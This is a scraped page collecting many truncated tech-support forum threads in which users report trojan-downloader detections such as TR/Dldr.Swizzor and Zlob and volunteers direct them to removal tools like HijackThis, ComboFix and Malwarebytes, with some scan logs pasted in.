C:\Programme\Analog Devices\SoundMAX\SMAgent... Read more

Read other 2 answers
RELEVANCY SCORE 39.6

My AntiVir picked this up in my Pegasus Mail ARchive File today File is : PIQCQY03...MS05-039.
It also saId that it doesnt remove infected archive files, so how do I identify this and get rid of it? I went to the MS site to download their Malicious software removal tool but found that it doesnt apply to WIN 98SE which is what I have.
Has anyone else experience with this virus aNd how to deal with it. If you haVe, Make your instructions SIMPLE 101 please Thanks in aDvaNce!
 

A:tr/dldr.Small.23

What is the entire path to the locate of that file please?

Please do this. Click here to download HijackThis.

Close all open windows and open HijackThis. Click “Scan”. When the scan is finished, the scan button will change to “Save Log”. Click on “Save Log” and then save it to Notepad. Click on “Edit” – “Select all” – “copy” and then “paste” into the thread.

DO NOT FIX ANYTHING YET, most items that appear in the log are harmless or even needed.
 

Read other 1 answers
RELEVANCY SCORE 39.6

hi there,

i recently had the win32.zlob.dldr virus on my laptop with windows xp. it gave me a background with the please click to activate anti-virus software prompt which was blatently fake.

i managed to get onto mozilla firefox and i started to search for antiviruses.

i used spybot search and destroy and when i finally managed to get it to open up it removed all sorts of crap from my laptop.

however, it could not remove one of the viruses because it was in my archives.

also, i could not get into task manager or use run or anything like that.

i am not the best with computers so i went onto google and i found help on how to get all of these back. it helped as i got run, taskmanager and most of my other vital things back. however i could not locate the existing virus and i still cannot get rid of that background and i still cannot get my windows security updates to switch on.

can anyone offer adivse on how to fix this problem?

thanks.

gav.

A:win32zlob.dldr

Welcome to TSF

To get Expert Help with malware removal:

I recommend that you read this article… "Simply, click on the links to be re-directed.

"Having problems with spyware and pop-ups? - First Steps";
http://www.techsupportforum.com/secu...oval-help.html

Please follow the instructions very carefully; then, post all the requested logs and information; as instructed, in the
HiJackThis Log Help Forum.
http://www.techsupportforum.com/secu...this-log-help/

Please ensure that you create a new thread in the HiJackThis Log Help Forum;
not back here in this one.

When carrying out The 5 Steps,
http://www.techsupportforum.com/secu...oval-help.html

if you cannot complete any of them for whatever reason, just continue on with the next one until they are all completed.
However,it is extremely important to make mention of the fact that you could not complete any of the steps in your post to HiJackThis Log Help Forum.
http://www.techsupportforum.com/secu...this-log-help/

where an Analyst will assist you with other workarounds.

Once done, please be patient, as the Security Team Analysts are usually very busy; one of them will answer your request as soon as they can. .

After your system has been verified as clean, if you are still experiencing those problems come back here and we will assist you further.

Read other 1 answers
RELEVANCY SCORE 39.6

hi
I fed up with this problem, this is a trojan file taht I can't delete or quarantine.

need your help plz
the trojan name is: tr/dldr.small.js.1
and it's active in this directory: C:\Documents and Settings\*********\Local Settings\Temporary Internet Files\Content.IE5\AUBCNO9B\ads[1].js

I'm sure that you can help

A:tr/dldr.small.js.1 !!!!!!!!!!

hello ,

follow this link

(http://www.pandasecurity.com)

it is a free online scanner that will rid your system of viruses

you will want to look to the left of the main page for (Short Cuts) in this box you will want to select ( Free Online Scanner )

you will have to give a legit (e-mail address) & download a (active x) / the active x is stubborn so you may have to redo it a couple of times

do not buy anything it is free

now when you get ready to scan you will want to select to scan you local disk / harddrive

now be prepared for this scan is very intensive and can take 1hr to 2 hrs depending on the size of your harddrive and how full you have it

thn get back to us and let us know if it solved it or not

Mike

Read other 1 answers
RELEVANCY SCORE 39.6

I have been having a problem with a recent virus or spyware that is on my computer. I use Virus Scan On Access, and every time that it pops up with the virus message it says that the virus: Spywarestrike.dldr has been deleted, But about 10 minutes later the same message will pop up. I have tried almost everything there is on the net to fix the problem. If any one could help me i would appreciate it.
 

A:Spywarestrike.dldr

Read other 9 answers
RELEVANCY SCORE 39.6

Hello and thank you in advance for taking the time to help me with this problem.

My AntiVir program keeps catching the aforementioned trojan virus and even though I click to delete, it catches it again about an hour later. I have scanned with updated Spybot and Ad-aware programs, plus the daily Antivir scan. I also cleared my two temporary files folders.

There are a few annoying pornographic pop-up ads every now and then as well, but I forgot to write down the address bar info the last time it happened.

I have a 75 Gb hard drive with about 44% used.
Running Windows XP.
Here is my current hijack log. Please advise where to go from here.
Thank you,

Bob Hoagland
 

A:TR/Dldr virus will not go away!

Read other 8 answers
RELEVANCY SCORE 39.6

My computer has been infected with a Trojan and possibly multiple malware. I use Windows 7 and have AntiVir and MalwareBytes for virus protection. I have tried everything I can think of to remove this trojan. it keeps coming back, and it seems like a stronger virus each time, becoming more difficult to locate and harder to delete.

I'm unsure of what the source was, but the problem occured shortly after two incidents:
1) I have a SeaGate external harddrive. Whenever I plug it into a computer, AntiVir will pop up everytime. It won't detect anything, I've scanned the drive multiple times with various programs, and they pull up nothing. I assumed this was just a response to the AutoRun or a glitch of some sort... until now. I had recently transfered about 1gb of music from my harddrive to my computer when this problem started.

2) I visited a website (walmart.com) using Internet Explorer, and immediately upon opening the web page, AntiVir went crazy with detections.
They were all for 'Roaming Spyware', so I immediately closed the browser, ran CCleaner to empty the cache, and then ran MalwareBytes and AntiVir.
Neither program detected anthing. Over the next couple of days I kept my computer off of the internet (unplugging it) and made sure to run my virus programs a few times before using it for anything other then just playing games offline.

For a few weeks my computer was running a little bit slow, but it wasn't slow enough for it to really bother me, a... Read more

A:TR/Dldr.Tracur.B.265

Hello and Welcome to the forums! My name is Gringo and I'll be glad to help you with your computer problems. Somethings to remember while we are working together.Do not run any other tool untill instructed to do so!Please Do not Attach logs or put in code boxes.Tell me about any problems that have occurred during the fix.Tell me of any other symptoms you may be having as these can help also.Do not run anything while running a fix.We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.Click on the Watch Topic Button and select Immediate Notification and click on proceed, this will help you to get notified faster when I have replied and make the cleaning process faster.In order for me to see the status of the infection I will need a new set of logs to start with.Please print out or make a copy in notpad of any instructions given, as sometimes it is necessary to go offline and you will lose access to them.DeFogger: Please download DeFogger to your desktop.

Double click DeFogger to run the tool.
The application window will appear Click the Disable button to disable your CD Emulation drivers Click Yes to continue A 'Finished!' message will ap... Read more

Read other 3 answers
RELEVANCY SCORE 39.2

Hi: I have a PC using Windows XP, partitioned into two drives. My browser is IE8. I also use Avira Antivir Personal and run it routinely. I have a DSL wi-fi connection. A couple of weeks ago, I picked up a virus that prevented me from loading any web page on my C: drive. Instead, I would get a IE8 message that said the internet connection could not be made. At that time, I also got a window that would pop up saying my PC was infected and I needed to scan it right away, please click yes or no. I recognized it as an obvious fake. I did NOT have the same problem with my D: drive. In addition, although I could not connect to the internet on my C: drive, I was able to use Outlook as normal to send/receive e-mail.

Attempting to run Avira on C: would not work. I switched to D: and updated Avira's db before running a scan. The scan found four suspicious files (I'm sorry I don't rmemeber what they were), but no unwanted programs. I quarantined the lot, and rebooted. Unfortunately, I ran into the same problem all over again.

I again rebooted, but in safe mode. I turned off system restore, and ran an Avira scan again. Again, it found four suspicious files. I quarantined them, then rebooted in normal mode, rescanned with Avira. Nothing found. I turned system restore back on, attempted to connect to the internet via IE8, and still couldn't do it. At that point, I shut down for the night.

The next day, I booted up the PC, opened IE8, and right away got my regular home page. I chec... Read more

A:TR/Dldr.Zlob.iyt.1 virus

Hi

My name is Iain and I will be helping you clean your system.

You may wish to Subscribe to this thread (Thread Tools > Subscribe to this thread) so that you are notified when you receive a reply.

Please read these instructions carefully and then print out or copy this page to Notepad in order to assist you when carrying out the fix. You should not have any open browsers or live internet connections when you are following the procedures below.

Note that the fix may take several posts. Please continue to respond to my instructions until I confirm that your logs are clean. Remember that although your symptoms may vanish, this does NOT mean that your system is clean.

If there is anything you don't understand, please ask BEFORE proceeding with the fixes.

Please ensure that you follow the instructions in the order I have them listed.

Please do not install or uninstall any programmes, or run any other scanners or software, unless I specifically ask you to do so. Also please copy and paste logs into the thread, rather than add them as attachments.




Combofix
We will begin with ComboFix.exe. Please visit this webpage for download links, and instructions for running the tool:

http://www.bleepingcomputer.com/comb...o-use-combofix

Please read all the information carefully!

You MUST disable your AntiVirus and AntiSpyware applications - please read this thread as a guide. They may otherwise interfere with our tools and interrupt the cleansing... Read more

Read other 19 answers
RELEVANCY SCORE 39.2

This weekend I had a hard attack of TROJANs. (TR/Drop , Buzu, Crypt to the Temp files)

I was trying to remowe them and for 3 days I have had peace.

Today once again... What can I do with them??????????

What I did before:

With AVIRA (updated, free downloaded version) I moved them to quarentine, I have deleted all my Temp files, I have deleted all the cookies, internet sites ...

I was running without internet my PC on safe mode - "cs?kkentett ?zemm?d" if it is that ... - I have Hungarian version of Windows XP. And AVIRA once again. Avira has no find any detection.

After was a peace.

Today I have got TR/Dldr.Ag.35328.GA TROJAN and TR6Agent.AH.335 Trojan to WINDOWS/system32/kbdnet.dll

I have never had such things in my PC ... What can I do with them ... ???
Why they are comming back???

Please, help me, as I am not a big IT guru, I am so helpless now.

A:TR/Dldr.Ag.35328.GA TROJAN

Hello and welcome to TSF.

We want all our members to perform the steps outlined in the link given below, before posting for assistance. There's a sticky at the top of this forum, and a
Quote:




Having problems with spyware and pop-ups? First Steps




link at the top of each page.

Please follow our pre-posting process outlined here:

http://www.techsupportforum.com/f50/...lp-305963.html

After running through all the steps, you shall have a proper set of logs. Please post them in a new topic, as this one shall be closed.

If you have trouble with one of the steps, simply move on to the next one, and make note of it in your reply.

Read other 1 answers
RELEVANCY SCORE 39.2

I have an infected file: "1 help eggs.exe" in "C:\Documents and Settings\User\Datos de programa\mp3 frag". It is also in the startup by that same name or "default.exe". (http://virusscan.jotti.org):According to an ANTIVIR Antivirus online scan it is infected with "TR/Dldr.Swizzor.CO", but it doesn't exist in their online encyclopaedia.NOD32 found "probably a variant of Win32/TrojanDownloader.Swizzor" and NORMAN VIRUS CONTROL found "Lop.E" It installs a Search Bar with my windows cached internet username on my Internet Explorer 6 and copies ads icons on my desktop. The search bar for example may say: "Computer, Members, Search, Forum, Personal, [My username], Forums" according to a possible keylogger or something that detects what I'm doing.Seems to be pretty similar to "http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_DLOADER.RS"Microsoft Antispyware just blocked some of its actions, Ad-aware couldn't be less aware of it.Here's the Hijackthis log:Logfile of HijackThis v1.99.1Scan saved at 02:19:29 a.m., on 09/08/2005Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)Running processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\W... Read more

A:New bad guy?: TR/Dldr.Swizzor.CO. How to remove it?

Hello incubus and welcome to the BC HijackThis forum. After reviewing your log I see a few items that require our attention. Please print these directions and then proceed with the following steps in order.That is a LOP infection that comes from using Messenger Plus. It includes a LOP installer when the program is installed. To remove it, please print these directions and then proceed with the following steps in order.Step #1Download CCleaner and install it but do not run it yet.Remove these installed programs using Add or Remove Programs in the Control Panel:Click Start.Click Control Panel.Double-click Add or Remove Programs.Look in the Currently installed programs box for each program listed below and if it is there:Click on it to select it.Click Change (or Change/Remove) button.If you are prompted to confirm the removal of the program, click Yes.Messenger Plus (any version)Step #2Start in Safe Mode Using the F8 method:Restart the computer.As soon as the BIOS is loaded begin tapping the F8 key until the boot menu appears.Use the arrow keys to select the Safe Mode menu item.Press the Enter key.Step #3Start HijackThis and click the Scan button to perform a scan. Look for the following items and click in the checkbox in front of each item to select it:R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://ikjxuhszxnqajuxcgw.com/DUIb/_gDlwtE...5f6EjhmTjmU.jpgR0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page =... Read more

Read other 1 answers
RELEVANCY SCORE 39.2

TR/Dldr.Swizzor.CO was found by antivir software on my computer after downloading messenger 3 by microsoft.

how would you go about deleting this?

it keeps popping up and the virus program can't seem to get rid of it?

A:Virus TR/Dldr.Swizzor.CO

This should work

Read other 1 answers
RELEVANCY SCORE 39.2

I have tried ad-aware,Spybot, Anti-Vir Guard, cleanmgr, House Call Antivirus, Panda Antivirus, Bit Defender, McAfee Stinger, a-squared antivirus, Trojan Hunter. But it still keeps popping up in different files. It keeps me from being able to change my backgrounds in the display properties. Here is my log from Hijack this. Hope I did it right this time:Logfile of HijackThis v1.99.1Scan saved at 5:31:01 AM, on 1/3/2007Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)Running processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\csrss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\system32\spoolsv.exeC:\Program Files\AntiVir PersonalEdition Classic\sched.exeC:\Program Files\AntiVir PersonalEdition Classic\avguard.exeC:\WINDOWS\Explorer.EXEC:\WINDOWS\system32\dla\tfswctrl.exeC:\WINDOWS\System32\DSentry.exeC:\Program Files\Dell\Media Experience\PCMService.exeC:\Program Files\Common Files\Real\Update_OB\realsched.exeC:\Program Files\... Read more

A:Virus-tr/dldr.small.cpg.1

ktysonPlease follow the instructions in your original topic and respond to that thread only.http://www.bleepingcomputer.com/forums/ind...mp;#entry423398This thread is closed.

Read other 1 answers
RELEVANCY SCORE 39.2

My wifes computer has been infected with this Trojan and I have used your services in the past for my own computer with great results. I have followed the checklist procedure before posting this thread and here is the HJT Log after all preliminary scanning was done. Thanks in advance for your help.-------------------------------------------------------------Logfile of Trend Micro HijackThis v2.0.2Scan saved at 2:10:12 PM, on 1/31/2008Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exeC:\WINDOWS\Explorer.EXEC:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exeC:\Program Files\Java\jre1.6.0_03\bin\jusched.exeC:\WINDOWS\system32\spoolsv.exeC:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exeC:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exeC:\WINDOWS\system32\svchost.exeC:\Program Files\Internet Explorer\IEXPLORE.EXEC:\Program Files\Trend Micro\HijackThis\HijackThis.ex... Read more

A:Infected With Tr/dldr.agent.hkb

Hello Mattagin and welcome to the BC HijackThis forum. I don;t see anything in the HJT log. Let's see what else we can find.Before running the scan let's clean out the temporoary folders. Download ATF CleanerDouble-click ATF-Cleaner.exe to run the program.Click Select All found at the bottom of the list.Click the Empty Selected button.If you use Firefox browser, do this also:Click Firefox at the top and choose Select All from the list.Click the Empty Selected button.NOTE : If you would like to keep your saved passwords, please click No at the prompt.If you use Opera browser, do this also:Click Opera at the top and choose Select All from the list.Click the Empty Selected button.NOTE : If you would like to keep your saved passwords, please click No at the prompt.Click Exit on the Main menu to close the program.Now download WinPFind35u.exe to your Desktop and double-click on it to extract the files. It will create a folder named WinPFind35u on your desktop.Note: You must be logged on to the system with an account that has Administrator privileges to run this program.Close ALL OTHER PROGRAMS.Open the WinPFind3u folder and double-click on WinPFind35U.exe to start the program (if you are running on Vista then right-click the program and choose Run as Administrator).In the Drivers section click on Non-Microsoft.Under Additional Scans click the checkboxes in front of the following items to select them:Reg - BotCheck
File - Additional Folder Scans
Do not change any other settings.Now... Read more

Read other 14 answers
RELEVANCY SCORE 39.2

I was browsing the internet when avira popped up with a trojan detection in my temporary internet file folder. The file name is w.js. Here is my HJT log:Logfile of Trend Micro HijackThis v2.0.2Scan saved at 7:48:54 AM, on 10/3/2008Platform: Windows XP SP3 (WinNT 5.01.2600)MSIE: Internet Explorer v7.00 (7.00.6000.16705)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\Ati2evxx.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\Program Files\Lavasoft\Ad-Aware\aawservice.exeC:\WINDOWS\system32\LEXBCES.EXEC:\WINDOWS\system32\LEXPPS.EXEC:\WINDOWS\system32\spoolsv.exeC:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exeC:\Program Files\a-squared Free\a2service.exeC:\Program Files\Common Files\Acronis\Schedule2\schedul2.exeC:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exeC:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exeC:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exeC:\Program Files\Bonjour\mDNSResponder.exeC:\Program Files\COMODO\Firewall\... Read more

A:Tr/dldr.agent.cro Trojan

Hello melbb,Hello and Welcome to the forums!My name is Mas_pogi/Mark and I'll be glad to help you with your computer problems. HijackThis logs can take some time to research, so please be patient with me. I know that you need your computer working as quickly as possible, and I will work hard to help see that it happens. As I am still in training I will be helping you under supervision of our expert teachers, so there may be a delay between posts.Please do not run any other tool untill instructed to do so!Please reply to this thread, do not start another!Please tell me about any problems that have occurred during the fix.Please tell me of any other symptoms you may be having as these can help also.Please try as much as possible not to run anything while executing a fix.With Regards,mas_pogi

Read other 10 answers
RELEVANCY SCORE 39.2

Your help is greatly appreciated, Thankyou
DDS (Ver_09-01-07.01) - NTFSx86
Run by owner at 13:14:48.04 on Thu 2009-01-08
Internet Explorer: 6.0.2800.1106
Microsoft Windows 2000 Professional 5.0.2195.4.1252.1.1033.18.447.159 [GMT -6:00]
============== Running Processes ===============

C:\WINNT\system32\spoolsv.exe
C:\WINNT\system32\netdde.exe
C:\Program Files\Lavasoft\Ad-Aware\aawservice.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
C:\WINNT\system32\cisvc.exe
C:\Program Files\Common Files\Authentium\AntiVirus\dvpapi.exe
C:\WINNT\Explorer.EXE
C:\WINNT\system32\hidserv.exe
C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
C:\Program Files\iolo\common\lib\ioloServiceManager.exe
C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\Program Files\Raxco\PerfectDisk\PDAgent.exe
C:\WINNT\system32\HPZipm12.exe
C:\Program Files\AT&T\AT&T Internet Security Suite\rpsupdaterR.exe
C:\WINNT\system32\stisvc.exe
C:\WINNT\system32\VTTimer.exe
C:\WINNT\syste... Read more

A:Virtumonde, TR/Dldr.Murlo.VN, and more

Howdy, my name is Hoov, and I will be helping you with your dilemma. I appologize for the delay in getting you help.Please make sure you watch this thread for responses. If you click the options tab at the top of your first post, you can select to track this thread. Here is what I am asking you to do during the repair of your computer*Tell me everything that you have done, if anything, to try and fix this problem.*Please only use 1 forum to help clear up your problem. Posting on more than 1 and following instructions from more than 1 forum will cause those helping you to pull out thier hair.*Follow my instructions - If you can't for some reason, or if you don't understand something, please tell me. If you deviate from my instructions, tell me, it may make a difference on where we go. Don't install anything, even other programs that have nothing to do with security or malware, it could cause things to change, and I would never know it. *Have faith. I will do all I can to get your computer working, and if I can't - someone else here will know something else to try. *Stick with me to the end. My aim is to fix your problems, and give you the tools and knowledge to keep this from happening again.Now onto trying to fix your computer.Please download Malwarebytes Anti-Malware and save it to your desktop.alternate download link 1alternate download link 2Make sure you are connected to the Internet.Double-click on mbam-setup.exe to install the application.When the installation begins, f... Read more

Read other 3 answers
RELEVANCY SCORE 39.2

I've tired numerous spyware adware programs with no luck. I've also used HJT to remove some obvious items but still need some help.
Andrew

A:tr/dldr.conhook.gen malware

This is the HJT Log for the above problem:

Logfile of HijackThis v1.99.1
Scan saved at 7:04:31 PM, on 8/31/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\AntiVir PersonalEdition Classic\avguard.exe
C:\Program Files\AntiVir PersonalEdition Classic\sched.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\ATI Technologies\ATI.ACE\cli.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\Java\jre1.6.0_02\bin\jusched.exe
C:\Program Files\AntiVir PersonalEdition Classic\avgnt.exe
D:\Up and Down\UTorrent V1.6.1\UTorrent V1.6.1\UTorrent V1.6.1.exe
C:\Program Files\Palm\Hotsync.exe
C:\Program Files\Winamp\winampa.exe
C:\Program Files\ATI Technologies\ATI.ACE\cli.exe
C:\Program Files\ATI Technologies\ATI.ACE\cli.exe
C:\Program Files\internet explorer\iexplore.exe
C:\Program Files\internet explorer\iexplore.exe
C:\Program Files\HijackThis\HijackThis.exe

O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7... Read more

Read other 12 answers
RELEVANCY SCORE 39.2

I have been getting this riskware in which Ad-aware detects infected files such as A0000910.exe in the system restore folder. I then attempt to quarantine or delete the file. When I run the scan a few days later, it seems that it picks up a new file, but the ending digits change (eg. A000410.exe). I am thinking that I have a virus that is infecting my restore files, but when I scan, it just picks up the infected files, not the file/program that is infecting the restore files. Here is a line that is from Ad-aware Pro:

Logfile created: 6/16/2009 21:9:25
Lavasoft Ad-Aware version: 8.0.5
Description: C:\System Volume Information\_restore{428D0952-7789-4B99-B3BD-4F9A4332BCA1}\RP11\A0000910.exe Family Name: SPR/Dldr.DigStream Clean status: Success Item ID: 0 Family ID: 0

I hope that information helps with diagnosing the problem. Thank you!

----REQUESTED DDS INFORMATION----

DDS (Ver_09-05-14.01) - NTFSx86
Run by Nick at 23:04:50.45 on Tue 06/16/2009
Internet Explorer: 8.0.6001.18702
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.2046.1175 [GMT -4:00]

AV: Lavasoft Ad-Watch Live! Anti-Virus *On-access scanning enabled* (Updated) {A1C4F2E0-7FDE-4917-AFAE-013EFC3EDE33}
AV: ESET Smart Security 4.0 *On-access scanning enabled* (Updated) {E5E70D32-0101-4F12-8FB0-D96ACA4F34C0}
FW: ESET Personal firewall *enabled* {E5E70D32-0101-4340-86A3-A7B0F1C8FFE0}

============== Running Processes ===============

C:\WINDOWS\system32&... Read more

A:Infected with SPR/Dldr.DigStream

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results.Foll... Read more

Read other 2 answers
RELEVANCY SCORE 39.2

Hi I have recently intstalled I-tunes and all its components (Quicktime, Bonjour, etc) for my sons Ipod shuffle and when I lauched Quicktime COMODO BOClean 4.26 kicked in saying dldr-zlob.nt malware stopped by boclean! location of startup: file c:\program\files\qt\qtsyst\exportcontroller.exe. This trojan horse program was found on your machine. It has been shut down, but thew FILE from which it started still remains and can be started up again. Do you still want the file removed also? YES or NO. I am running windows XP.

A:dldr-zlob.nt detectected

Hello and to BleepingComputer.Let's see what we're dealing with here.Please download RKill by Grinler from one of the 4 links below and save it to your desktop.Link 1Link 2Link 3Link 4Before we begin, you should disable any anti-malware software you have installed so it does not interfere with RKill running. This is because some anti-malware software mistakenly detects RKill as malicious. Please refer to this page if you are not sure how to disable your security software.Double-click on Rkill on your desktop to run it. (If you are using Windows Vista, please right-click on it and select Run As Administrator)A black screen will appear and then disappear. Please do not worry, that is normal. This means that the tool has been successfully executed. If nothing happens or if the tool does not run, please let me know in your next reply***************************************************Please download Malwarebytes Anti-Malware and save it to your desktop.alternate download linkIMPORTANT!!! - when you save the file, rename it to something random, such as bubbles.exe This must be done before beginning the download!MBAM may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (ie Spybot's Teatimer), they may interfere or alert you. Temporarily disable such programs or permit them to allow the changes.Make sure you are connected to the Internet.Double-click on mba... Read more

Read other 1 answers
RELEVANCY SCORE 39.2

Hi

Recently I have been experiancing some problems with my computor, such as it running slow and not shutting down easily. Also, I can connect to my wireless internet connection with a signal stregth of good-excelent but my computor will not allow me to access or use the internet in any way, it is asif it is offline.

I have run AntiVir Guard, Ad-Aware and Ewido antivirus programs. Between them they have come up with a list of viruses that I am infected with but I beleive that there are more. I have tried to delete these viruses but have not been able to and I have not been able to find the sources either. I am currently in the process of trying to get rid of Adware.Istbar using BC's self-help section but am not succeding.

The viruses that I can find are
TR/Dldr.Swizzor.CO
TR/Dldr.Swizzor.bo
TR/Dldr.Swizzor.CN
TR/Dldr.Swizzor.cb
TR/Dldr.IstBar.KP

My computor is a Vaio laptop with Windows XP

I would like to rid my computor of these and all other viruses, can you please advise me on how I should do this and how i should prevent further Trojan Horses from attacking my computor.

Thanks,
Ellen

A:How Do I Remove Tr/dldr.swizzor.co ?

Try the steps and programs here

Read other 2 answers
RELEVANCY SCORE 39.2

Today I used a bookmark to go to a site I've been to before. My computer gave a single beep even though the sound was off. Then AntiVir Guard popped up saying it found HTML/Dldr.Agen.QV.7 but it had no information for it. Neither did a search for it have any information. Does anyone know what this is? I quarantined it.

Thanks
vano
 

A:HTML/Dldr.Agen.QV.7

Where was it found? In the Content.IE5 folder?
 

Read other 3 answers
RELEVANCY SCORE 39.2

Hi,
I have Antivir running on my Win XP-home and a couple of days ago it reported "Trojan TR/Dldr.Small.hme" on C:\windows\system32\pmnmmlj.dll AntiVir is than offering a couple of choices (delete, deny access, delete on startup ...) but nothing helps. This dll still remain on my computer.
After google through the web i found a very similar problem on this site (557097-cannot-delete-infected-dll-used.html) where a similar dll (concerning the dll name) could not be removed. In that thread i think cookiegal constructed a special registrykey to be able to stop some service and remove the dll. But i have no idea how to create this registry key (but maybe i am completly wrong). so here is my hijackthis log and i also attached a winpfind3.log (these are from 9th january as i was not at home till know, but the system did not run in between)
Hope anybody can help me!! Thanks in advance!
Logfile of HijackThis v1.99.1
Scan saved at 23:20:30, on 09.01.2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\Programme\Windows Defender\MsMpEng.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\explorer.exe
C:\Dokumente und Einstellungen\paul\Desktop\Troja\H.exe

F3 - REG:win.ini: load=C:\WINDOWS\system32\pmnnl.exe
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9... Read more

A:Trojan TR/Dldr.Small.hme

Read other 10 answers
RELEVANCY SCORE 39.2

Hi, I'm running Windows 7 Home Premium on a Gateway Nv55C Intel Core i5 - 460m processor. I'm using Avira personal. I usually use Firefox to navigate and I have a 64 bit OS so couldn't run Gmer

Avira started popping up a message that TR/Dldr.Renos.PG.56 [trojan] had been found in my temp folder. After a little research I discovered this could hide in Npx.exe. In my temp folder I found Npw.exe, Npx.exe and Npy.exe. I tried to delete all of them (stupidly). Npx.exe could not be deleted as it was in use. So I started task manager, went to processes, found Npx.exe*32 and stopped it. Then immediately deleted it. As far as I know it shouldn't be showing up in there so I figured this was the source of the virus. I then emptied my Temp folder and my recycle bin. After a restart, windows security centre would not turn on. To fix this I went into services.msc to enable it. Services.msc would not start due to a problem with Active X (another sign of a virus I believe). So I used Regedit and navigated to: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ &
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
One of them had a registry L in it (I forget which) so I deleted that. Services.msc would now run. So then I went in and set security centre from disabled to automatic. This worked for a few seconds but then it was disabled again. I tried delayed auto too and the same thing happened. Syste... Read more

A:TR/Dldr.Renos.PG.56 [trojan]

Bump
 

Read other 1 answers
RELEVANCY SCORE 39.2

Hello my antivirus(Avira) keeps giving me a warning that I have a trojan called TR/Dldr.Agent.apzz, and no matter what I do it comes back in about a quarter of a second.

How can I remove it for good?
It keeps making a new file and moving to that file whenever I try to delete it or move it to a quarantine, and when I tried to delete the file directly the computer gave me an access denied message.
 

A:TR/Dldr.Agent.apzz

